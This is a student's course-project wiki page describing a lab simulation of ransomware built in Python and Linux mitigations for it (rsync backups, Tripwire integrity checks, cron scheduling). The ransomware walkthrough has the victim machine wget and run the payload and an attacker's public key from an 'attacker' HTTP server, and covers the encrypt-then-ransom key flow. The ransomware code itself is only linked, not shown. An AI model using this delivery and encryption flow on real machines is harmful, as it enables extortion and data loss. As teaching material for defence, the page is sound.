Project 4 Ransomware and Mitigation - Zacham17/my-tech-journal GitHub Wiki

In this project, I completed the following objectives:

  • Created python files to simulate a ransomware scenario:
    • Created a ransomware python file
    • Created a python file to decrypt they key used to encrypt victim files
    • db03(MariaDB Database)
  • Configured MariaDB on db01, db02, and db03
  • Configured the database servers as a galera cluster
  • Created a Simple PHP Web Application that interacts with the databases

The code page for this project can be found here

Ransomware

The Process

Three python files were used in this project. The ransomware file is called zamsomware.py, the key decryptor is called key_decrypt.py, and the file decryptor is is called. The process of file encryption and decryption is as follows:

  1. The victim downloads the ransomware file and the attacker's public key.
  2. The victim runs the ransomware file
  3. The ransomware generates a symmetric key to encrypt the victim's files, and then encrypts the symmetric key so the victim can't decrypt the files.
  4. The victim pays the ransom and send the encrypted symmetric key to the Attacker
  5. The attacker decrypts the symmetric key
  6. The attacker gives the victim the decrypted symmetric key and the file used to decrypt the files
  7. The victim runs the file decryption file and their files are decrypted.

Creating zamsomware.py

The zamzomware.py file is the ransomware in this scenario. The python script generates a random symmetric key in memory that is then used to encrypt file that have a .zam file extension. Encrypted files are given a .getrekt file extension. Then, the symmetric key is encrypted using the attacker's public key and they encrypted symmetric key is stored as a file. Lastly, I have my ransomware remove the attacker's public key from the system, since it is no longer needed.

The code used in zamsomware.py can be found here.

Creating key_decrypt.py

The key_decrypt.py file is only used on the attacker system. When they victim sends the encrypted symmetric key to the attacker, this file is used to decrypt the symmetric key so that the victim can use it to decrypt their files. The key_decrypt.py file decrypts the symmetric key by using the attacker's private key(since it was encrypted using the attacker's public key). The decrypted symmetric key is output as a file.

The code used in key_decrypt.py can be found here.

Creating file_decrypt.py

The file_decrypt.py file decrypts the victims encrypted files. It uses the decrypted symmetric key to decrypt files with the ".getrekt" extension(which is the file extension given to the encrypted files). In order for this file to run, the decrypted symmetric key must be present. Once it runs, the files are decrypted.

The code used in file_decrypt.py can be found here

Ransomware Execution and Decryption:

The following steps outline the specific steps taken to execute the ransomware on the victim and go through the decryption process.

Encryption Process

  1. On both the attacker and victim systems run the commands:
sudo apt update
sudo apt install python3-pip
  1. On the Attacker device, create a directory by running the following commands:
mkdir ransom
cd ransom

The zamsomware.py, key_decrypt.py, and file_decrypt.py files should be stored in the created directory.

  1. On the attacker, generate a public/private keypair using the following commands:
# To Generate the Private Key #
openssl genpkey -algorithm RSA -out private_key.pem

# To Generate the public key #
openssl rsa -pubout -in private_key.pem -out public_key.pem

  1. Start a simple python HTTP server on the attacker using the command: python3 -m http.server

  2. On the Victim, create a directory called testFiles and move into it:

mkdir testFiles
cd test
  1. On the victim machine, from within the testFiles directory create files with the ".zam" file extension and add contents to each file. An example of commands to do this are below.
echo "I am a cool file" > file1.zam
echo "I am the coolest file" > file2.zam
echo "Hello there, I am a very special file" > pleaseDontEncrypt.zam
  1. On the victim machine, download the ransomware and attacker's public key. This is done using wget:
wget http://10.0.5.6:8000/zamsomware.py
wget http://10.0.5.6:8000/public_key.pem
  1. Run the ransomware on the victim machine: python3 zamsomware.py

Decryption Process:

  1. From the victim machine, transfer the encrypted symmetric key to the attacker. For simplicity, this is done with the scp command:
scp sym_key.enc [email protected]:/home/champuser/ransom/
  1. On the attacker device, decrypt the symmetric key using the key_decrypt fie:
python3 key_decrypt.py
  1. On the victim machine download the decrypted symmetric key and file_decrypt.py file from the attacker maching:
wget http://10.0.5.6:8000/sym_key.dec
wget http://10.0.5.6:8000/file_decrypt.py
  1. Use file_decrypt.py to decrypt the files on the victim device:
python3 file_decrypt.py

Mitigation

There are numerous methods that can be used to mitigate the effects of ransomware. The methods that I used in this project are directory backups and the usage of tripwire to detect directory changes.

Directory Backup

Backups in linux can be created using either the rsync command or the tar command.

# TAR Example #
tar -zcf /var/backups/home.tgz

# rsync Example #
rsync -aAXv --delete --backup /sourceDIR /targetDIR

This project uses the rsync command. The command that I used to create a backup is below: rsync -aAXv --delete --backup /home/zachary/testFiles/ /home/zachary/backups/testFiles_$(date +"%Y%m%d_%H%M%S")

Tripwire

Tripwire is used to monitor file integrity. It flags when files are modified or moved. This can be used to identify when the ransomware encrypts files. The following steps outline how to install Tripwire:

  1. Run the command sudo apt install -y tripwire. Put the default inputs and enter passwords when prompted
  2. Run the command sudo tripwire --init. This will cause errors due to directories not being found, but they are fixed in the next step.
  3. To determine which files are not found, run the command: sudo sh -c "tripwire --check | grep Filename > no-directory.txt". The paths shown in the created no-directory.txt file should be commented out in the /etc/tripwire/twpol.txt file.
  4. At the bottom of the /etc/tripwire/twppol.txt file, add the following contents:
# Ruleset for testFiles
(
  rulename = "Website Data Ruleset",
  severity= $(SIG_HI)
)
{
        /home/zachary/testFiles        -> $(SEC_CRIT);
}

  1. Save the twpol.exe file. To apply the changes, run the command: sudo twadmin -m P /etc/tripwire/twpol.txt

  2. Initialize tripwire by running sudo tripwire --init

  3. Run tripwire --check to check the directories, and then run a command similar to twprint --print-report --twrfile /var/lib/tripwire/report/db03-zachary* > /home/zachary/tripwireReps/report.txt to output the binary report to a text file with something like the following. The twrfile directory will differ.

  4. View the contents of the report.txt file to see any changes that were made.

Using Cronjob to automate rsync and tripwire

Cron can be used to schedule the commands used for directory backup and tripwire checks. This can be done by using the command sudo crontab -e -u root to open the contab file. Add the following content to the file:

0 0 * * * rsync -aAXv --delete --backup /home/zachary/testFiles/ /home/zachary/backups/testFiles_$(date +"%Y%m%d_%H%M%S")

0 0 * * * tripwire --check

0 0 * * * twprint --print-report --twrfile /var/lib/tripwire/report/db03-zachary* > /home/zachary/tripwireReps/report.txt

The "0 0 * * *" before each command specifies to run the commands at midnight on every day or every month, of every year. This automation allows for there to be multiple backups present so only a day's worth maximum of data is lost if files are lost or encrypted. The tripwire commands can be set to run more often as well if the user wants the files to be scanned more often than daily.

Reflection

In the process of performing and creating Project 4 on Ransomware and Mitigation, I learned about the mechanics of ransomware and explored mitigation strategies. The project involved the creation of a simulated ransomware scenario using Python scripts, specifically zamsomware.py for encryption, key_decrypt.py for key decryption, and file_decrypt.py for file decryption. Creating these files and building the testing environment allowed me to understand the intricate steps involved in a ransomware attack, from the victim's initial download and execution of the ransomware to the final decryption of files. I also gained an understanding of how symmetric and asymmetric key encryption is used in a ransomware scenario. I also learned about basic mitigation strategies in linux, such as file integrity monitoring and the creation of data backups. I originally encountered some challenges decrypting the symmetric key. At first, I tried decrypting the symmetric key using a one liner command, but this didn't appropriately decrypt the key. To overcome this challenge, I created the key_decrypt python file to decrypt the symmetric key.